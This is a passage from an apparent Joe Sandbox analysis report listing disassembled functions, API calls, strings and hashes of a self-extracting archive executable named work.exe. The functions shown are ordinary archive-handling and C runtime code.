                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                                                              • String ID:
                                                                                              • API String ID: 1868215902-0
                                                                                              • Opcode ID: 9fe7f667389cc1264a3d18e78e48c728f87d38c3704ef45b9a5c53f37287d9fc
                                                                                              • Instruction ID: 329a6fad3383764cb12e0a07e6c9817745e1d279f99979639e464b6e6f353878
                                                                                              • Opcode Fuzzy Hash: 9fe7f667389cc1264a3d18e78e48c728f87d38c3704ef45b9a5c53f37287d9fc
                                                                                              • Instruction Fuzzy Hash: 31015E76000B04EFC7339B64ED85BC6FBADFB09710F014939F26A56160CB767A65CA90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0033D9BF Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _free.LIBCMT ref: 0033D9D7
                                                                                                • Part of subcall function 0033A66A: RtlFreeHeap.NTDLL(00000000,00000000,?,0033DA56,?,00000000,?,00000000,?,0033DA7D,?,00000007,?,?,0033DE7A,?), ref: 0033A680
                                                                                                • Part of subcall function 0033A66A: GetLastError.KERNEL32(?,?,0033DA56,?,00000000,?,00000000,?,0033DA7D,?,00000007,?,?,0033DE7A,?,?), ref: 0033A692
                                                                                              • _free.LIBCMT ref: 0033D9E9
                                                                                              • _free.LIBCMT ref: 0033D9FB
                                                                                              • _free.LIBCMT ref: 0033DA0D
                                                                                              • _free.LIBCMT ref: 0033DA1F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                              • String ID:
                                                                                              • API String ID: 776569668-0
                                                                                              • Opcode ID: 5d4d34081239ef1bd355fda14b3e261e3ed93220fcf3e42f618d84fec72a1296
                                                                                              • Instruction ID: 4bfaacc0d04c7d0f6d134b7c4eb5d773bfba8829b3b417098ea2dbf9608deb9d
                                                                                              • Opcode Fuzzy Hash: 5d4d34081239ef1bd355fda14b3e261e3ed93220fcf3e42f618d84fec72a1296
                                                                                              • Instruction Fuzzy Hash: A2F01272614B00EB8627DB64F9C7D1673EDBB04711F6A0C09F488EB561CB71FC808654
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00323338 Relevance: 7.5, APIs: 5, Instructions: 39COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _wcslen.LIBCMT ref: 00323340
                                                                                              • _wcslen.LIBCMT ref: 00323351
                                                                                              • _wcslen.LIBCMT ref: 00323361
                                                                                              • _wcslen.LIBCMT ref: 0032336F
                                                                                              • CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,0031C844,?,?,00000000,?,?,?), ref: 0032338A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$CompareString
                                                                                              • String ID:
                                                                                              • API String ID: 3397213944-0
                                                                                              • Opcode ID: ea32f826a2f6b075ed259b0770ba0e11a2159f78d2b589b7db37761eed67a6f0
                                                                                              • Instruction ID: bbccb9803166db102fd72d9b6ce97051cb5bae018fd520abff00496495cfcdf9
                                                                                              • Opcode Fuzzy Hash: ea32f826a2f6b075ed259b0770ba0e11a2159f78d2b589b7db37761eed67a6f0
                                                                                              • Instruction Fuzzy Hash: 06F01736008124BBCF136F61EC49DCE7F26EF95B60F258015FA296E061CE32A6659B90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00339CD0 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _free.LIBCMT ref: 00339CEE
                                                                                                • Part of subcall function 0033A66A: RtlFreeHeap.NTDLL(00000000,00000000,?,0033DA56,?,00000000,?,00000000,?,0033DA7D,?,00000007,?,?,0033DE7A,?), ref: 0033A680
                                                                                                • Part of subcall function 0033A66A: GetLastError.KERNEL32(?,?,0033DA56,?,00000000,?,00000000,?,0033DA7D,?,00000007,?,?,0033DE7A,?,?), ref: 0033A692
                                                                                              • _free.LIBCMT ref: 00339D00
                                                                                              • _free.LIBCMT ref: 00339D13
                                                                                              • _free.LIBCMT ref: 00339D24
                                                                                              • _free.LIBCMT ref: 00339D35
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                              • String ID:
                                                                                              • API String ID: 776569668-0
                                                                                              • Opcode ID: ff8d01a0649f876dab881ea684c7d56c5d1be071942b2e18f41b36be5d211ef8
                                                                                              • Instruction ID: 72c8edff994713e93b29dca1b69151d2cefa5233e02c3faf4dc2a5cdf64bc584
                                                                                              • Opcode Fuzzy Hash: ff8d01a0649f876dab881ea684c7d56c5d1be071942b2e18f41b36be5d211ef8
                                                                                              • Instruction Fuzzy Hash: CAF0F474501A50DBC62B6F14FC8380437B9F725722F150A0AF49D5A275DB725991CF85
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00322948 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 197COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: _swprintf
                                                                                              • String ID: %ls$%s: %s
                                                                                              • API String ID: 589789837-2259941744
                                                                                              • Opcode ID: 7140af4e4e7cb43f98c64bc8cf11eeb9422ce3345f9ab45cabdd76e8dac121e7
                                                                                              • Instruction ID: 01612befd9f60eca7b45bd8f74c9bda3ea814e86ecf098b08c6fb59f9661f684
                                                                                              • Opcode Fuzzy Hash: 7140af4e4e7cb43f98c64bc8cf11eeb9422ce3345f9ab45cabdd76e8dac121e7
                                                                                              • Instruction Fuzzy Hash: 2E51EC31688320FEEA275A94BC02F7B765DAF18B01F204506F7876CCE5CBA155A06717
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00339330 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe,00000104), ref: 00339370
                                                                                              • _free.LIBCMT ref: 0033943B
                                                                                              • _free.LIBCMT ref: 00339445
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$FileModuleName
                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe
                                                                                              • API String ID: 2506810119-1799323542
                                                                                              • Opcode ID: ad316f37401f6e552797677ebb94142d3326cdb23e60a47f6dca567a0e92533f
                                                                                              • Instruction ID: 96b5613331481e19a9d131de26beb44ce76ee9dece111fcf720a8684d8ca3d15
                                                                                              • Opcode Fuzzy Hash: ad316f37401f6e552797677ebb94142d3326cdb23e60a47f6dca567a0e92533f
                                                                                              • Instruction Fuzzy Hash: 4D3183B1A04258EBDB23DB9A9CC1E9EBBFCEB85710F114067F5089B251D7B09A418B91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00334366 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 0033438B
                                                                                              • _abort.LIBCMT ref: 00334496
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: EncodePointer_abort
                                                                                              • String ID: MOC$RCC
                                                                                              • API String ID: 948111806-2084237596
                                                                                              • Opcode ID: bf1c1a6235b8461d0b86ad94f6a091a6676631ad2bf73b9dd583fb03bf957340
                                                                                              • Instruction ID: 8619645d01c3986fea33a65e55138c75a48dc6e746b00c100dd30a3656b5d7ac
                                                                                              • Opcode Fuzzy Hash: bf1c1a6235b8461d0b86ad94f6a091a6676631ad2bf73b9dd583fb03bf957340
                                                                                              • Instruction Fuzzy Hash: 0C417A71900209AFCF16DF98DD81AEEBBB5FF08314F158069FA146B221D335E961DB50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00317F1B Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 92COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00317F20
                                                                                                • Part of subcall function 003142F1: __EH_prolog.LIBCMT ref: 003142F6
                                                                                              • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 00317FE5
                                                                                                • Part of subcall function 00318704: GetCurrentProcess.KERNEL32(00000020,?), ref: 00318713
                                                                                                • Part of subcall function 00318704: OpenProcessToken.ADVAPI32(00000000), ref: 0031871A
                                                                                                • Part of subcall function 00318704: GetLastError.KERNEL32 ref: 00318759
                                                                                                • Part of subcall function 00318704: CloseHandle.KERNEL32(?), ref: 00318768
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorH_prologLastProcess$CloseCurrentHandleOpenToken
                                                                                              • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                                                              • API String ID: 2595646239-639343689
                                                                                              • Opcode ID: d7dd84048d9241dcfad7a38007f59684a76a0ce777f67e70a5ba986769ffd07e
                                                                                              • Instruction ID: 8df3a883fb1094ae466579833e077fe88effdc0e03cebba6f313901e430929cd
                                                                                              • Opcode Fuzzy Hash: d7dd84048d9241dcfad7a38007f59684a76a0ce777f67e70a5ba986769ffd07e
                                                                                              • Instruction Fuzzy Hash: FC31C031940348BEDF2BEB649C41BEEBBBDAB0C354F040025F405AB191DB748A85CBA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0032BDE0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 003112F6: GetDlgItem.USER32(00000000,00003021), ref: 0031133A
                                                                                                • Part of subcall function 003112F6: SetWindowTextW.USER32(00000000,003445F4), ref: 00311350
                                                                                              • EndDialog.USER32(?,00000001), ref: 0032BE68
                                                                                              • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 0032BE7D
                                                                                              • SetDlgItemTextW.USER32(?,00000066,?), ref: 0032BE92
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: ItemText$DialogWindow
                                                                                              • String ID: ASKNEXTVOL
                                                                                              • API String ID: 445417207-3402441367
                                                                                              • Opcode ID: 37b7824eb5d8864163958e7be006664c5fdcf13bc36ecf3cfafa0a803331499f
                                                                                              • Instruction ID: c9d9bd2b253f23052dbf1b96d06a40122f77a8409dcbae11331e3a0ea266e7a5
                                                                                              • Opcode Fuzzy Hash: 37b7824eb5d8864163958e7be006664c5fdcf13bc36ecf3cfafa0a803331499f
                                                                                              • Instruction Fuzzy Hash: 1F11E633600522BFE6239F68FC06FFAB7ADEB4A740F020414F744AB0B4C76299459766
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0031EC0C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __fprintf_l.LIBCMT ref: 0031EC74
                                                                                              • _strncpy.LIBCMT ref: 0031ECBA
                                                                                                • Part of subcall function 003230F5: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00353070,00000200,0031EC48,00000000,?,00000050,00353070), ref: 00323112
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide__fprintf_l_strncpy
                                                                                              • String ID: $%s$@%s
                                                                                              • API String ID: 562999700-834177443
                                                                                              • Opcode ID: 5847c0c721275f8ae8f543280d8d6afedab34362d99bf308bbcfa4a9fa01dcec
                                                                                              • Instruction ID: 842774401fb78232d619d62f9f2c8fcbcadf2441a10c74f26422a5bfd7054cce
                                                                                              • Opcode Fuzzy Hash: 5847c0c721275f8ae8f543280d8d6afedab34362d99bf308bbcfa4a9fa01dcec
                                                                                              • Instruction Fuzzy Hash: 6921A57284031CAEEB26DFA4CD41FDF3BE8AF09700F140522FD119A191E772E6848B91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00322166 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,0031C04A,00000008,?,00000000,?,0031E685,?,00000000), ref: 003221A5
                                                                                              • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,0031C04A,00000008,?,00000000,?,0031E685,?,00000000), ref: 003221AF
                                                                                              • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,0031C04A,00000008,?,00000000,?,0031E685,?,00000000), ref: 003221BF
                                                                                              Strings
                                                                                              • Thread pool initialization failed., xrefs: 003221D7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                                              • String ID: Thread pool initialization failed.
                                                                                              • API String ID: 3340455307-2182114853
                                                                                              • Opcode ID: 7ce859d655af0c3ae106b720f0cac53375090eda2b22e2334d92959db2a6c8ec
                                                                                              • Instruction ID: 9b7e1e802694092b9ff75b775d6f63a2e97ddb8fa866023cac94d0d1aa23d3ab
                                                                                              • Opcode Fuzzy Hash: 7ce859d655af0c3ae106b720f0cac53375090eda2b22e2334d92959db2a6c8ec
                                                                                              • Instruction Fuzzy Hash: 5611E7B1604719AFD3224F7AAC84A97FBECFB55344F50482EF6D6C7200DA7069508B60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0032C460 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 003112F6: GetDlgItem.USER32(00000000,00003021), ref: 0031133A
                                                                                                • Part of subcall function 003112F6: SetWindowTextW.USER32(00000000,003445F4), ref: 00311350
                                                                                              • EndDialog.USER32(?,00000001), ref: 0032C4AE
                                                                                              • GetDlgItemTextW.USER32(?,00000066,?,00000200), ref: 0032C4C6
                                                                                              • SetDlgItemTextW.USER32(?,00000067,?), ref: 0032C4F4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: ItemText$DialogWindow
                                                                                              • String ID: GETPASSWORD1
                                                                                              • API String ID: 445417207-3292211884
                                                                                              • Opcode ID: eb49558c4a951bb5bc16ea809e73e6030d5a676c2fc7527c7e14867c224d95c6
                                                                                              • Instruction ID: 8c6ac21c3652311772690440d0abaf92dd8634cb348201dd223ecb72edc7afd9
                                                                                              • Opcode Fuzzy Hash: eb49558c4a951bb5bc16ea809e73e6030d5a676c2fc7527c7e14867c224d95c6
                                                                                              • Instruction Fuzzy Hash: B611087291013876DB376A79BC99FFF376CEB45714F010421FB05F6480C27499429660
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0032EE2D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                                              • API String ID: 0-56093855
                                                                                              • Opcode ID: 0fa0c3c1f0ff36c8e1e9ba612311f83fc10a89bfb6dd6a7e7f03446b6a88b34d
                                                                                              • Instruction ID: 51478b6fc1e3b05bfcbc40fd6a6255bd6c52c29622e8584582adb41070234b97
                                                                                              • Opcode Fuzzy Hash: 0fa0c3c1f0ff36c8e1e9ba612311f83fc10a89bfb6dd6a7e7f03446b6a88b34d
                                                                                              • Instruction Fuzzy Hash: E20171B1604765EFD7234F69FC49A963FECFB05395F010125F90A87270D2B19890EBA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00314957 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 0031495C
                                                                                                • Part of subcall function 0032FD1D: std::invalid_argument::invalid_argument.LIBCONCRT ref: 0032FD29
                                                                                                • Part of subcall function 0032FD1D: ___delayLoadHelper2@8.DELAYIMP ref: 0032FD4F
                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 00314967
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: Xinvalid_argumentstd::_$Helper2@8Load___delaystd::invalid_argument::invalid_argument
                                                                                              • String ID: string too long$vector too long
                                                                                              • API String ID: 2355824318-1617939282
                                                                                              • Opcode ID: 5dceaeb8ef23ea4168d2ac290921857fc64c7ef8fc5f903534e4a9490e0944e0
                                                                                              • Instruction ID: 687ca0c5f4fe9db92959cf255efa016494eab81774957085bf29df31bae8db2f
